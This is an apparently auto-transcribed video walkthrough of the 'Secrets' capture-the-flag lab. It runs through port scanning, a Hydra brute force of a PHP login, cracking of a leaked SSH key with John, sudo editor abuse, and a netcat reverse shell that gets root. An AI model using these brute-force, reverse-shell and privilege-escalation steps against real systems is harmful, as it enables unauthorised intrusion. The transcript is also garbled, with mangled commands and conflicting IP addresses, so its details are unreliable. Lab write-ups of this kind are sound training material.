Hello guys, welcome back to Appendixes Club. Today we're going to solve another CTF challenge name called a Secrets. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. Now, first open the terminal. Now, first you just type your sudo su, enter your password, then later you just type your net discord minus r is 0. So first we would like to identify our target mission here. So I have identified my target mission is here. Then later you just type it as nmap minus reform minus a is an aggressive scan and enter your targeted IP address. So I have got the nmap result. One is available with SSH, another one is available with port 8. It's in Apache server. So let's we would like to walk to the Apache server. You just enter your targeted IP address 192.163.18.184. It shows I have to tell you a secret. Okay. We would like to look here. Written by Brad. So, quite easy. Here, I have got the username is Brad. So, let's copy here as uh, username is Brad. Quite interesting. Okay, quite good. Now, let's just copy, come back here. Now, we would like to go with the directory buster with the 84, then Nikto. We would like to look here in the both. Where I have find here as something here as a secrets. We just visit to the secret tab. I keep wanting to tell you a secret. We would like to look the page source. Okay, here is nothing else. Now you just copy this one, come back here. Now let's just type here as clear. Now you just clear as directory buster, then paste. Here I didn't get anything else, so let me just put here as .php files. Either we are maybe going to get it anything else. So even we not get with a default worthless. Now I would like to utilize here as a Gobuster directory minus u. Let me I just come back here 184 secrets. Now I just put here as PHP. Let's just try to get it here. I have got here a login form.php. Quite interesting. So just copy this one, come back here, just paste here. Now, we already know the username is Brad. So how should we can get here as the password? So to crack this password, we would like to try to utilize I would like to try to write a simple script. Otherwise, we would like to look here as the page source first. Action is I would like to open this one in the new link tab. Invalid credentials. Okay. Let's just paste it. Okay. Invalid credentials. Username equal to user placeholder. We don't know the password to crack it. Either we can try to go directly We would like to utilize here. Let's just come back. Let me just quit this. Type here as clear. Just here as Hydra minus L. We know the username. Just put here as user share wordlist rocky.txt. Then enter your target type address 182.168.18.184. Then it is in HTTP pop post. Then let's just put here as a secrets. Then where is this? We just need to copy this one. Let's just paste here. Then just put here as user equal to Brad and password equal to, you just put for a caps for pass. That's it. Then what else? Here it was presented here. This is a invalid credentials. I just paste it here. Now let's just put here as minus f minus I. We for purpose for that. Let's I think I think it's the right one, but why it's not getting here? Brad rocky.txt. Okay, I think I have made a mistake here. Let's just put as a invalid credentials. Now it tried to go for a crack it now. Let's it go for resolving the password. I have got the password right now. So I have identified the password is Brad and Bradley. Let's just copy, come back here. Come back. Where is this? Username is Brad. Password is Bradley. Password, try to sign in. So enter IP to send a secrets. Okay, I would like to open a Wireshark for this. Quite interesting here. Let me just make that a little bit big. Okay. Now let's just come back here. Enter your targeted IP address 192.168.18.122. Try to submit. Secrets number. We would like to look here. $184. So I think we not get anything else. So we would like to look here. Here, a post, the hidden secret I have received here. Hypertext transfer protocol. We would like to look here. Now, how we would like to try to get to this? Now, I just try to quit this. So I think in this case, it's not going to be work out. Let me just type here as a clear. Now, let's come back here. Now, you just put here nano bash dot sh. Now, let's just write here as with the bin bash. So let's just write here as IP2 uh, decimal. Let's just put here fs equal to now read minus r minus a octatos decimal equal to 0 for I equal to 0, then I is lesser than 4. Now let's just put for here as I plus plus, then try here as 2. Now operator equal to just put for here as $8, then uh, octato octato we would like to try to print the I. Now a decimal let's just put here in the downloads with a decimal start with the 256 plus octato now just put here as done. Now now printing echo in with the dollars as a decimal. After that I just close this as decimal here. Now let's just put here as a read minus p as so I would like to read the targeted IP address as in IPv4. Now let's just put here as a decimal. The decimal equal to or go for dollars. So put for a IP to decimal, then as this one IP to decimal IPv4. That's it here. Let's just close echo. I would like to try to print the IP, then dollars with the IPv4 in the format of decimal yes to $8 a decimal. That's a type control O, control X. You just clear as a bash.sh. So here is a mistake cat a bash.sh. So I would like to use a ChatGPT. Let's come back here. So sometimes you just need to use a ChatGPT to rectify your errors. Solve this error. your bash script multiple issues, including with the decimal duration. Copy, come back. Let's come back here. You just put here as clear. You just put here as a mousepad bash.sh. Let's just put here paste it, then try to save this. Close this. Now try to run this a bash.sh. chmod 600 bash.sh. No. Now enter your target. Type address 192.168.18.122. I have find my targeted of the IP to a decimal. Okay, quite interesting. Let me just type here as clear. I would like to put here as an cat a listener. Now let's close this. Come back. So you would like to look in this page. So it's access not granted. Okay. Now let's just try continue without saving. Then try to submit a query. Now you can look here where in this case I have get a listening the port. Here I have got the RSA key now, the secret. Quite interesting here. Now let's entirely just copy this one. Now open new tab. Now you just put here as nano id underscore RSA. Oh, sorry. Let me just quit this. Remove id underscore RSA. Now we have this hash. Now we would like to try to crack this hash. How we would like to crack this? Let me just put here as clear. You just put here as nano hash. Let me just put paste here. Type control O, control X. Just put here as sh2 jump hash to hash 1. Done. Now just utilize here as John wordless equal to, we just put here as user share wordless, that utilize here as arrow.txt. That's it. Now put here as a hash 1. That's it. Now we are going to crack this password. We have got the password is security. Quite interesting. Now just put here as chmod 600 for hash. Now let me just type here as clear. You just put here as sh. Let's just put here as a hash. Then username is Brad. I just type yes. Enter the password of key as secret. So where we have came to a secret. Now just type plus. We have got here plus minus l. Just try to read here. Cat a user.txt. Quite interesting. Now you just type here as who am I? Get here. Now plus minus l. Let me just type here as clear. Just type here as sudo minus l. We have get here user pin date. Now let's how we would like to read here. Let me just type here as cd as home plus minus l cd a fabin. It's like no exist, so we're not going to have permissions to execute this one. So we would like to utilize here as sudo minus u user bin dent, from where to access the file from home fabin. Then just put here as a bash list. Oh, sorry, I need to enter sudo minus l. I would like to put here as fabin. That's it. Oh, sorry, Fabian. So I have made a mistake here. Fabian. That's it. So where you can look here, password for a Fabian is secret love dollars. Quite interesting here. So we have filed this the password also. Now just try here as su Fabian. Password is this one. Just paste it. Where we have got it here. Now we came to here as a Fabian. Now you just type here as list minus l cd Fabian. Let me just type here as clear list minus l. Nothing else. You just put here as sudo minus l. Where we have got here as ZED. Now to get a ZUD, how we would like to try to do here as let's we would like to utilize as let's we would like to try here as sudo ZED where this is a scratch we would like to try here as try here as F10 file. Okay, system. Now we have got here as a shell command. So I have got here under the command. Now let me, I can try to do here as so let me, I just put this here. Let me just put here as netcat minus lvnp 8888. Okay, quite interesting. Now let me just close this Wireshark quit without saving. Now let's come back here. Just put here as netcat minus e. Put here as bin bash. Add terraform target IP address 192.168.18.122. Output is 8888. That's it. Now I have get a connected here. You just type id, we are in the root. You just type here as cd a root. You just type here as a which Python I have got here. You just type here as Python minus c import as pdy span bin bash. That's it. So I have came to a root now directly. You just type plus minus here. You just type here as a cat a root.txt. I have got it here. That's it here. So we have successfully completed this mission. So we tried it on guys. Thank you guys for watching and keep smiling.